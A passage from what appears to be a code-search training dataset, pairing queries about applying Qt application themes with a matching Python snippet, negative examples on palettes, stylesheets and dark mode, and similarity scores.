run_parameters[\"correlation_measure\"])\n\n output_file_name = kn.create_timestamped_filename(output_file_name) + '_' + suffix_string + '.' 
+ type_suffix\n return output_file_name", "def _get_temp_file_name():\n tmpfile = tempfile.NamedTemporaryFile(prefix=\"TESS_\")\n h, t = ntpath.split(tmpfile.name)\n return t or ntpath.basename(h)", "def _getfilename(self):\n pass", "def _get_output_filename(dataset_dir):\n return os.path.join(dataset_dir, 'pokemon.tfrecord')", "def GetOutputFilename(fname):\n return os.path.join(outdir, fname)", "def get_name(self):\n return self.file_name", "def _file_name(self, dtype_out_time, extension='nc'):\n out_lbl = utils.io.data_out_label(self.intvl_out, dtype_out_time,\n dtype_vert=self.dtype_out_vert)\n in_lbl = utils.io.data_in_label(self.intvl_in, self.dtype_in_time,\n self.dtype_in_vert)\n ens_lbl = utils.io.ens_label(self.ens_mem)\n yr_lbl = utils.io.yr_label((self.start_date.year, self.end_date.year))\n return '.'.join(\n [self.name, out_lbl, in_lbl, self.model.name,\n self.run.name, ens_lbl, yr_lbl, extension]\n ).replace('..', '.')", "def GetFileName(self) -> \"char const *\":\n return _itkVTKPolyDataReaderPython.itkVTKPolyDataReaderMF2_GetFileName(self)", "def GetFileName(self) -> \"char const *\":\n return _itkVTKPolyDataReaderPython.itkVTKPolyDataReaderMD2_GetFileName(self)" ]
[ "0.74351394", "0.7248863", "0.72257614", "0.7196246", "0.70979714", "0.7075223", "0.7033236", "0.7024702", "0.7010298", "0.698268", "0.6951329", "0.6924173", "0.69214404", "0.691918", "0.6910793", "0.69105744", "0.6872355", "0.6843693", "0.6799241", "0.6777324", "0.67486", "0.67329013", "0.6722986", "0.671325", "0.6695107", "0.6694636", "0.6646135", "0.6603093", "0.65832734", "0.6579765" ]
0.7691399
0
Apply base theme to the application.
def _apply_base_theme(self, app):
    app.setStyle("Fusion")
    with open(self._STYLESHEET) as stylesheet:
        app.setStyleSheet(stylesheet.read())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def apply_theme(self, ax):\n pass", "def apply_style(self, app):\n\n darkPalette = QPalette()\n\n # base\n darkPalette.setColor(QPalette.WindowText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Button, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.Light, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Midlight, QColor(90, 90, 90))\n darkPalette.setColor(QPalette.Dark, QColor(35, 35, 35))\n darkPalette.setColor(QPalette.Text, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.BrightText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.ButtonText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Base, QColor(42, 42, 42))\n darkPalette.setColor(QPalette.Window, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.Shadow, QColor(20, 20, 20))\n darkPalette.setColor(QPalette.Highlight, QColor(42, 130, 218))\n darkPalette.setColor(QPalette.HighlightedText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Link, QColor(56, 252, 196))\n darkPalette.setColor(QPalette.AlternateBase, QColor(66, 66, 66))\n darkPalette.setColor(QPalette.ToolTipBase, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.ToolTipText, QColor(180, 180, 180))\n\n # disabled\n darkPalette.setColor(\n QPalette.Disabled, QPalette.WindowText, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.Text, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.ButtonText, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.Highlight, QColor(80, 80, 80)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.HighlightedText, QColor(127, 127, 127)\n )\n\n app.setPalette(darkPalette)\n self._apply_base_theme(app)\n\n IconSet.current.set_color(QColor(180, 180, 180))", "def apply_style(self, app):\n\n lightPalette = QPalette()\n\n # base\n lightPalette.setColor(QPalette.WindowText, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.Button, QColor(240, 240, 240))\n lightPalette.setColor(QPalette.Light, QColor(180, 180, 180))\n lightPalette.setColor(QPalette.Midlight, QColor(200, 200, 200))\n lightPalette.setColor(QPalette.Dark, QColor(225, 225, 225))\n lightPalette.setColor(QPalette.Text, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.BrightText, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.ButtonText, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.Base, QColor(237, 237, 237))\n lightPalette.setColor(QPalette.Window, QColor(240, 240, 240))\n lightPalette.setColor(QPalette.Shadow, QColor(20, 20, 20))\n lightPalette.setColor(QPalette.Highlight, QColor(76, 163, 224))\n lightPalette.setColor(QPalette.HighlightedText, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.Link, QColor(0, 162, 232))\n lightPalette.setColor(QPalette.AlternateBase, QColor(225, 225, 225))\n lightPalette.setColor(QPalette.ToolTipBase, QColor(240, 240, 240))\n lightPalette.setColor(QPalette.ToolTipText, QColor(0, 0, 0))\n\n # disabled\n lightPalette.setColor(\n QPalette.Disabled, QPalette.WindowText, QColor(115, 115, 115)\n )\n lightPalette.setColor(\n QPalette.Disabled, QPalette.Text, QColor(115, 115, 115)\n )\n lightPalette.setColor(\n QPalette.Disabled, QPalette.ButtonText, QColor(115, 115, 115)\n )\n lightPalette.setColor(\n QPalette.Disabled, QPalette.Highlight, QColor(190, 190, 190)\n )\n lightPalette.setColor(\n QPalette.Disabled, QPalette.HighlightedText, QColor(115, 115, 115)\n )\n\n app.setPalette(lightPalette)\n\n self._apply_base_theme(app)\n IconSet.current.set_color(QColor(0, 0, 0))", "def change_theme(self):\n # get the 
QApplication instance, or crash if not set\n app = QtWidgets.QApplication.instance()\n if app is None:\n raise RuntimeError(\"No Qt Application found.\")\n\n if self.darkCheckBox.isChecked():\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n else:\n app.setStyleSheet(\"\")", "def change_theme(self):\n # get the QApplication instance, or crash if not set\n app = QApplication.instance()\n if app is None:\n raise RuntimeError(\"No Qt Application found.\")\n\n if self.darkCheckBox.isChecked():\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n else:\n app.setStyleSheet(\"\")", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def dark_theme(self):\n if self.actionDark_Theme.isChecked():\n QApplication.setStyle(QStyleFactory.create(\"Fusion\"))\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(53, 53, 53))\n palette.setColor(QPalette.WindowText, Qt.white)\n palette.setColor(QPalette.Base, QColor(15, 15, 15))\n palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, Qt.white)\n palette.setColor(QPalette.Button, QColor(53, 53, 53))\n palette.setColor(QPalette.ButtonText, Qt.white)\n palette.setColor(QPalette.BrightText, Qt.red)\n palette.setColor(QPalette.Highlight, QColor(0, 24, 193).lighter())\n palette.setColor(QPalette.HighlightedText, Qt.black)\n palette.setColor(QPalette.Disabled, QPalette.Text, Qt.darkGray)\n palette.setColor(\n QPalette.Disabled, QPalette.ButtonText, Qt.darkGray)\n app.setPalette(palette)\n return\n\n app.setPalette(self.defaultPalette)", "def setup_theme(app):\r\n theme = app.config['THEME']\r\n app.template_folder = os.path.join('themes', theme, 'templates')\r\n app.static_folder = os.path.join('themes', theme, 'static')", "def new_theme(ctx, **defaults):\n from .quickstart import theme_quickstart\n\n project = ctx.get_project(silent=True)\n theme_quickstart(defaults, project=project)", "def theme(self, theme):\n\n self._theme = theme", "def refresh(self):\n self._themes = {}\n for theme in starchain(ldr(self.app) for ldr in self.loaders):\n if self.valid_app_id(theme.application):\n self.themes[theme.identifier] = theme\n self.register_theme_assets()", "def setup_theme(self):\r\n template_conf = self._config.template\r\n if isinstance(template_conf, str):\r\n # Either a local path or the name of built-in themes\r\n if os.path.exists(template_conf):\r\n template_conf = {\r\n 'name': os.path.split(template_conf)[-1],\r\n 'type': 'local',\r\n 'path': template_conf\r\n }\r\n elif template_conf in ['Kepler', 'Galileo']:\r\n template_conf = {\r\n 'name': template_conf,\r\n 'type': 'git',\r\n 'url': 'https://github.com/AlanDecode/Maverick-Theme-{}.git'.format(\r\n template_conf),\r\n 'branch': 'latest'\r\n }\r\n else:\r\n raise TemplateError('Can not found local theme {}'.format(\r\n self._config.template))\r\n\r\n # If its remote theme, clone it to disk first\r\n if template_conf['type'] == 'git':\r\n template_path = unify_joinpath(self._config._template_dir,\r\n template_conf['name'])\r\n if not os.path.exists(template_path):\r\n self.clone_remote_theme(self._config._template_dir, template_conf)\r\n template_conf['type'] = 'local'\r\n template_conf['path'] = template_path\r\n\r\n 
sys.path.insert(0, os.path.split(template_conf['path'])[0])\r\n\r\n # handle deps for theme\r\n template_dep_file = unify_joinpath(template_conf['path'],\r\n 'requirements.txt')\r\n if os.path.exists(template_dep_file) and os.path.isfile(template_dep_file):\r\n try:\r\n run('pip install -r %s' % template_dep_file, '.')\r\n except Exception:\r\n raise TemplateError('Can not install dependencies for theme.')\r\n\r\n from importlib import import_module\r\n self._template = import_module(template_conf['name'])", "def updateTheme(self):\n self.myUpdate(stateDict=None)", "def theme_template_base(context):\n template_path = os.path.join(settings.THEME_NAME, 'theme.html')\n return {'THEME_TEMPLATE': template_path}", "def setWidget(self, widget: QtWidgets.QWidget):\n super().setWidget(widget)\n if globalstuff.theme == 'dark':\n w = self.widget()\n w.setPalette(globalstuff.textpal)\n if hasattr(w, 'TreeWidget'):\n w.TreeWidget.setStyleSheet(globalstuff.treeqss)", "def setup_theme():\n os.system('sudo apt install arc-theme')\n\n output = \"{padding}{mark} Installing theme...\"\n print(output.format(padding=LEFT_PADDING, mark=BALLOT_MARK))", "def enable_theme():\r\n # Workaround for setting THEME_NAME to an empty\r\n # string which is the default due to this ansible\r\n # bug: https://github.com/ansible/ansible/issues/4812\r\n if settings.THEME_NAME == \"\":\r\n settings.THEME_NAME = None\r\n return\r\n\r\n assert settings.FEATURES['USE_CUSTOM_THEME']\r\n settings.FAVICON_PATH = 'themes/{name}/images/favicon.ico'.format(\r\n name=settings.THEME_NAME\r\n )\r\n\r\n # Calculate the location of the theme's files\r\n theme_root = settings.ENV_ROOT / \"themes\" / settings.THEME_NAME\r\n\r\n # Include the theme's templates in the template search paths\r\n settings.TEMPLATE_DIRS.insert(0, theme_root / 'templates')\r\n edxmako.paths.add_lookup('main', theme_root / 'templates', prepend=True)\r\n\r\n # Namespace the theme's static files to 'themes/<theme_name>' to\r\n # avoid collisions with default edX static files\r\n settings.STATICFILES_DIRS.append(\r\n (u'themes/{}'.format(settings.THEME_NAME), theme_root / 'static')\r\n )", "def applyStyle(self, target=QtGui.QApplication):\n target.setPalette(self.palette)", "def appstyle(whom, stylename = 'Plastique',stylecolor = 'Default'):\r\n\r\n## for iz in QtGui.QStyleFactory.keys():\r\n## print iz\r\n\r\n QtGui.QApplication.setStyle(QtGui.QStyleFactory.create(stylename))\r\n QtGui.QApplication.setPalette(QtGui.QApplication.style().standardPalette())\r\n applycolors(whom,stylecolor)", "def light_mode(grid: bool = False) -> sns.set_theme:\n if grid:\n return sns.set_theme(style=\"whitegrid\")\n sns.set_theme(style=\"white\")", "def main(themes):\n # Get toggled mode based on current system mode.\n toggled_mode = get_toggled_mode(get_current_mode())\n print('\\nSetting themes...')\n\n for theme in themes:\n # Set toggled mode.\n theme.mode = toggled_mode\n theme.toggle_callback(theme)\n if IS_WINDOWS:\n print(f'Setting system theme to: {toggled_mode.name}')\n toggle_mode(toggled_mode)\n print()", "def my_theme() -> Dict[str, Any]:\n return {\n \"config\": {\n \"view\": {\"height\": 400, \"width\": 600},\n \"legend\": {\"titleFontSize\": 20, \"labelFontSize\": 16},\n \"axis\": {\"grid\": False, \"labelFontSize\": 16, \"titleFontSize\": 20},\n \"header\": {\"titleFontSize\": 22, \"labelFontSize\": 18},\n \"background\": \"white\",\n }\n }", "def generateScheme(self, apply=True):\n BASE_COLOR = self.baseColor\n HIGHLIGHT_COLOR = self.highlightColor\n BRIGHTNESS_SPREAD = 
self.spread\n \n if self.__lightness(BASE_COLOR) > 0.5:\n SPREAD = 100/BRIGHTNESS_SPREAD\n else:\n SPREAD = 100*BRIGHTNESS_SPREAD\n \n if self.__lightness(HIGHLIGHT_COLOR)>0.6:\n HIGHLIGHTEDTEXT_COLOR= BASE_COLOR.darker(SPREAD*2)\n else:\n HIGHLIGHTEDTEXT_COLOR= BASE_COLOR.lighter(SPREAD*2)\n \n self.palette.setBrush(QtGui.QPalette.Window, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.WindowText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Foreground, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Base, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.AlternateBase, QtGui.QBrush(BASE_COLOR.darker(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.ToolTipBase, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.ToolTipText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Text, QtGui.QBrush(BASE_COLOR.lighter(SPREAD*1.2)))\n self.palette.setBrush(QtGui.QPalette.Button, QtGui.QBrush(BASE_COLOR.lighter(SPREAD/3)))\n self.palette.setBrush(QtGui.QPalette.ButtonText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.BrightText, QtGui.QBrush(QtGui.QColor(240, 240, 240)))\n \n self.palette.setBrush(QtGui.QPalette.Light, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Midlight, QtGui.QBrush(BASE_COLOR.lighter(SPREAD/2)))\n self.palette.setBrush(QtGui.QPalette.Dark, QtGui.QBrush(BASE_COLOR.darker(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Mid, QtGui.QBrush(BASE_COLOR)) \n self.palette.setBrush(QtGui.QPalette.Shadow, QtGui.QBrush(BASE_COLOR.darker(SPREAD))) \n \n self.palette.setBrush(QtGui.QPalette.Highlight, QtGui.QBrush(HIGHLIGHT_COLOR))\n self.palette.setBrush(QtGui.QPalette.HighlightedText, QtGui.QBrush(HIGHLIGHTEDTEXT_COLOR))\n if apply:\n QtGui.QApplication.setPalette(self.palette)", "def init_ui(self):\n self.parent.title(\"Roku Player Controller\")\n self.style.theme_use(\"default\")", "def themes(self, themes):\n\n self._themes = themes", "def on_load_theme (self):\n\n\t\tif self.has_started:\n\t\t\tself.init_buffers()\n\t\t\tself.redraw_background()\n\t\t\tself.redraw_foreground()", "def my_theme() -> Dict[str, Any]:\n font = \"Roboto\"\n return {\n \"config\": {\n \"view\": {\"height\": 400, \"width\": 600},\n \"legend\": {\n \"titleFontSize\": 20,\n \"labelFontSize\": 16,\n \"labelFont\": font,\n \"titleFont\": font,\n },\n \"axis\": {\n \"grid\": False,\n \"labelFontSize\": 16,\n \"titleFontSize\": 20,\n \"labelFont\": font,\n \"titleFont\": font,\n },\n \"header\": {\n \"titleFontSize\": 22,\n \"labelFontSize\": 18,\n \"titleFont\": font,\n \"labelFont\": font,\n },\n \"background\": \"white\",\n }\n }", "def makeThemeDrawer(self,node):\n themeDrawer = self.makeDrawer(node)\n themeDrawer.getRoot().setTexture(self.image)\n return themeDrawer", "def get_theme(self) -> str:\n return self.theme or self.account.theme" ]
[ "0.71454114", "0.7026285", "0.7016173", "0.6658857", "0.66372305", "0.6465947", "0.6465947", "0.6419377", "0.63436294", "0.6121915", "0.60901904", "0.607666", "0.6037439", "0.5978628", "0.5909347", "0.5894715", "0.5894359", "0.5853654", "0.5733367", "0.5661598", "0.56274146", "0.56220305", "0.549437", "0.54818314", "0.547481", "0.5384724", "0.5383973", "0.53242594", "0.52696514", "0.52685803" ]
0.83967525
0
Apply Light Theme to the Qt application instance.
def apply_style(self, app): lightPalette = QPalette() # base lightPalette.setColor(QPalette.WindowText, QColor(0, 0, 0)) lightPalette.setColor(QPalette.Button, QColor(240, 240, 240)) lightPalette.setColor(QPalette.Light, QColor(180, 180, 180)) lightPalette.setColor(QPalette.Midlight, QColor(200, 200, 200)) lightPalette.setColor(QPalette.Dark, QColor(225, 225, 225)) lightPalette.setColor(QPalette.Text, QColor(0, 0, 0)) lightPalette.setColor(QPalette.BrightText, QColor(0, 0, 0)) lightPalette.setColor(QPalette.ButtonText, QColor(0, 0, 0)) lightPalette.setColor(QPalette.Base, QColor(237, 237, 237)) lightPalette.setColor(QPalette.Window, QColor(240, 240, 240)) lightPalette.setColor(QPalette.Shadow, QColor(20, 20, 20)) lightPalette.setColor(QPalette.Highlight, QColor(76, 163, 224)) lightPalette.setColor(QPalette.HighlightedText, QColor(0, 0, 0)) lightPalette.setColor(QPalette.Link, QColor(0, 162, 232)) lightPalette.setColor(QPalette.AlternateBase, QColor(225, 225, 225)) lightPalette.setColor(QPalette.ToolTipBase, QColor(240, 240, 240)) lightPalette.setColor(QPalette.ToolTipText, QColor(0, 0, 0)) # disabled lightPalette.setColor( QPalette.Disabled, QPalette.WindowText, QColor(115, 115, 115) ) lightPalette.setColor( QPalette.Disabled, QPalette.Text, QColor(115, 115, 115) ) lightPalette.setColor( QPalette.Disabled, QPalette.ButtonText, QColor(115, 115, 115) ) lightPalette.setColor( QPalette.Disabled, QPalette.Highlight, QColor(190, 190, 190) ) lightPalette.setColor( QPalette.Disabled, QPalette.HighlightedText, QColor(115, 115, 115) ) app.setPalette(lightPalette) self._apply_base_theme(app) IconSet.current.set_color(QColor(0, 0, 0))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def change_theme(self):\n # get the QApplication instance, or crash if not set\n app = QtWidgets.QApplication.instance()\n if app is None:\n raise RuntimeError(\"No Qt Application found.\")\n\n if self.darkCheckBox.isChecked():\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n else:\n app.setStyleSheet(\"\")", "def change_theme(self):\n # get the QApplication instance, or crash if not set\n app = QApplication.instance()\n if app is None:\n raise RuntimeError(\"No Qt Application found.\")\n\n if self.darkCheckBox.isChecked():\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n else:\n app.setStyleSheet(\"\")", "def apply_style(self, app):\n\n darkPalette = QPalette()\n\n # base\n darkPalette.setColor(QPalette.WindowText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Button, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.Light, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Midlight, QColor(90, 90, 90))\n darkPalette.setColor(QPalette.Dark, QColor(35, 35, 35))\n darkPalette.setColor(QPalette.Text, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.BrightText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.ButtonText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Base, QColor(42, 42, 42))\n darkPalette.setColor(QPalette.Window, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.Shadow, QColor(20, 20, 20))\n darkPalette.setColor(QPalette.Highlight, QColor(42, 130, 218))\n darkPalette.setColor(QPalette.HighlightedText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Link, QColor(56, 252, 196))\n darkPalette.setColor(QPalette.AlternateBase, QColor(66, 66, 66))\n darkPalette.setColor(QPalette.ToolTipBase, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.ToolTipText, QColor(180, 180, 180))\n\n # disabled\n darkPalette.setColor(\n QPalette.Disabled, QPalette.WindowText, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.Text, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.ButtonText, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.Highlight, QColor(80, 80, 80)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.HighlightedText, QColor(127, 127, 127)\n )\n\n app.setPalette(darkPalette)\n self._apply_base_theme(app)\n\n IconSet.current.set_color(QColor(180, 180, 180))", "def dark_theme(self):\n if self.actionDark_Theme.isChecked():\n QApplication.setStyle(QStyleFactory.create(\"Fusion\"))\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(53, 53, 53))\n palette.setColor(QPalette.WindowText, Qt.white)\n palette.setColor(QPalette.Base, QColor(15, 15, 15))\n palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, Qt.white)\n palette.setColor(QPalette.Button, QColor(53, 53, 53))\n palette.setColor(QPalette.ButtonText, Qt.white)\n palette.setColor(QPalette.BrightText, Qt.red)\n palette.setColor(QPalette.Highlight, QColor(0, 24, 193).lighter())\n palette.setColor(QPalette.HighlightedText, Qt.black)\n palette.setColor(QPalette.Disabled, QPalette.Text, Qt.darkGray)\n palette.setColor(\n QPalette.Disabled, QPalette.ButtonText, Qt.darkGray)\n app.setPalette(palette)\n return\n\n app.setPalette(self.defaultPalette)", "def _apply_base_theme(self, app):\n\n app.setStyle(\"Fusion\")\n\n with open(self._STYLESHEET) as stylesheet:\n app.setStyleSheet(stylesheet.read())", "def apply_theme(self, 
ax):\n pass", "def setWidget(self, widget: QtWidgets.QWidget):\n super().setWidget(widget)\n if globalstuff.theme == 'dark':\n w = self.widget()\n w.setPalette(globalstuff.textpal)\n if hasattr(w, 'TreeWidget'):\n w.TreeWidget.setStyleSheet(globalstuff.treeqss)", "def updateTheme(self):\n self.myUpdate(stateDict=None)", "def appstyle(whom, stylename = 'Plastique',stylecolor = 'Default'):\r\n\r\n## for iz in QtGui.QStyleFactory.keys():\r\n## print iz\r\n\r\n QtGui.QApplication.setStyle(QtGui.QStyleFactory.create(stylename))\r\n QtGui.QApplication.setPalette(QtGui.QApplication.style().standardPalette())\r\n applycolors(whom,stylecolor)", "def applyStyle(self, target=QtGui.QApplication):\n target.setPalette(self.palette)", "def dark_mode(app):\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(30, 30, 30))\n palette.setColor(QPalette.WindowText, QColor(225, 225, 225))\n palette.setColor(QPalette.Light, Qt.white)\n palette.setColor(QPalette.Midlight, QColor(225, 225, 225))\n palette.setColor(QPalette.Dark, QColor(65, 65, 65))\n palette.setColor(QPalette.Mid, QColor(160, 160, 160))\n palette.setColor(QPalette.BrightText, QColor(255, 51, 51))\n palette.setColor(QPalette.Button, QColor(40, 40, 40))\n palette.setColor(QPalette.Base, QColor(65, 65, 65))\n palette.setColor(QPalette.AlternateBase, QColor(50, 50, 50))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, QColor(225, 225, 225))\n palette.setColor(QPalette.ButtonText, QColor(225, 225, 225))\n palette.setColor(QPalette.Link, QColor(42, 130, 218))\n palette.setColor(QPalette.Highlight, QColor(42, 130, 218))\n palette.setColor(QPalette.HighlightedText, Qt.black)\n app.setPalette(palette)\n return app", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def light_mode(grid: bool = False) -> sns.set_theme:\n if grid:\n return sns.set_theme(style=\"whitegrid\")\n sns.set_theme(style=\"white\")", "def theme(self, theme):\n\n self._theme = theme", "def generateScheme(self, apply=True):\n BASE_COLOR = self.baseColor\n HIGHLIGHT_COLOR = self.highlightColor\n BRIGHTNESS_SPREAD = self.spread\n \n if self.__lightness(BASE_COLOR) > 0.5:\n SPREAD = 100/BRIGHTNESS_SPREAD\n else:\n SPREAD = 100*BRIGHTNESS_SPREAD\n \n if self.__lightness(HIGHLIGHT_COLOR)>0.6:\n HIGHLIGHTEDTEXT_COLOR= BASE_COLOR.darker(SPREAD*2)\n else:\n HIGHLIGHTEDTEXT_COLOR= BASE_COLOR.lighter(SPREAD*2)\n \n self.palette.setBrush(QtGui.QPalette.Window, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.WindowText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Foreground, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Base, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.AlternateBase, QtGui.QBrush(BASE_COLOR.darker(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.ToolTipBase, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.ToolTipText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Text, QtGui.QBrush(BASE_COLOR.lighter(SPREAD*1.2)))\n self.palette.setBrush(QtGui.QPalette.Button, QtGui.QBrush(BASE_COLOR.lighter(SPREAD/3)))\n self.palette.setBrush(QtGui.QPalette.ButtonText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n 
self.palette.setBrush(QtGui.QPalette.BrightText, QtGui.QBrush(QtGui.QColor(240, 240, 240)))\n \n self.palette.setBrush(QtGui.QPalette.Light, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Midlight, QtGui.QBrush(BASE_COLOR.lighter(SPREAD/2)))\n self.palette.setBrush(QtGui.QPalette.Dark, QtGui.QBrush(BASE_COLOR.darker(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Mid, QtGui.QBrush(BASE_COLOR)) \n self.palette.setBrush(QtGui.QPalette.Shadow, QtGui.QBrush(BASE_COLOR.darker(SPREAD))) \n \n self.palette.setBrush(QtGui.QPalette.Highlight, QtGui.QBrush(HIGHLIGHT_COLOR))\n self.palette.setBrush(QtGui.QPalette.HighlightedText, QtGui.QBrush(HIGHLIGHTEDTEXT_COLOR))\n if apply:\n QtGui.QApplication.setPalette(self.palette)", "def new_with_dark_light(dark_theme, light_theme):\n theme = {\n \"dark\": Theme(dark_theme),\n \"light\": Theme(light_theme)\n }\n return theme", "def refresh(self):\n self._themes = {}\n for theme in starchain(ldr(self.app) for ldr in self.loaders):\n if self.valid_app_id(theme.application):\n self.themes[theme.identifier] = theme\n self.register_theme_assets()", "def setUIBrightness(self, value):\n\n\t\t# print(value)\n\t\tself.col['window'] = QtGui.QColor(value, value, value)\n\t\tself.computeUIPalette()\n\t\tself.loadStyleSheet()", "def on_load_theme (self):\n\n\t\tif self.has_started:\n\t\t\tself.init_buffers()\n\t\t\tself.redraw_background()\n\t\t\tself.redraw_foreground()", "def changeStyle(self, event=None):\n content = self.combo.get()\n try:\n self.style.theme_use(content)\n except tk.TclError as err:\n tk.messagebox.showerror('Error', err)\n else:\n self.theme.set(content)", "def update_background(self):\n color = QColorDialog().getColor()\n self.model.set('Look', 'background', str(color.name(QColor.HexRgb)))\n self.model.announce_update()", "def main(themes):\n # Get toggled mode based on current system mode.\n toggled_mode = get_toggled_mode(get_current_mode())\n print('\\nSetting themes...')\n\n for theme in themes:\n # Set toggled mode.\n theme.mode = toggled_mode\n theme.toggle_callback(theme)\n if IS_WINDOWS:\n print(f'Setting system theme to: {toggled_mode.name}')\n toggle_mode(toggled_mode)\n print()", "def __init__(self,baseColor=QtGui.QColor(50,50,50), highlightColor=QtGui.QColor(\"yellow\"), spread=2.5):\n self.palette = QtGui.QPalette()\n self.baseColor = baseColor\n self.highlightColor = highlightColor\n self.spread = spread\n self.generateScheme()\n QtGui.QApplication.setStyle(\"Plastique\")", "def theme_picker_open(self):\r\n if not self.md_theme_picker:\r\n self.md_theme_picker = MDThemePicker()\r\n self.md_theme_picker.open()", "def new_theme(ctx, **defaults):\n from .quickstart import theme_quickstart\n\n project = ctx.get_project(silent=True)\n theme_quickstart(defaults, project=project)", "def set_light_color(self, light_color):\n\n self.light_color = light_color", "def set_device_theme(dname, theme_type, number=0):\n\n # log in theme app like i theme\n activity_name = theme_config.getValue(dname,'set_theme_pkg')\n #DEVICE = device.Device(dname)\n #DEVICE.app_operation(action='LAUNCH', pkg=activity_name)\n DEVICE = adbtools.AdbTools(dname)\n #DEVICE.start_application(activity_name)\n find_text = [u'忽略本次']\n try:\n threads = []\n install_app = threading.Thread(target=DEVICE.start_application(), args=(activity_name,))\n proc_process = threading.Thread(target=myuiautomator.do_popup_windows, args=(5, find_text, dname))\n threads.append(proc_process)\n threads.append(install_app)\n for t in threads:\n 
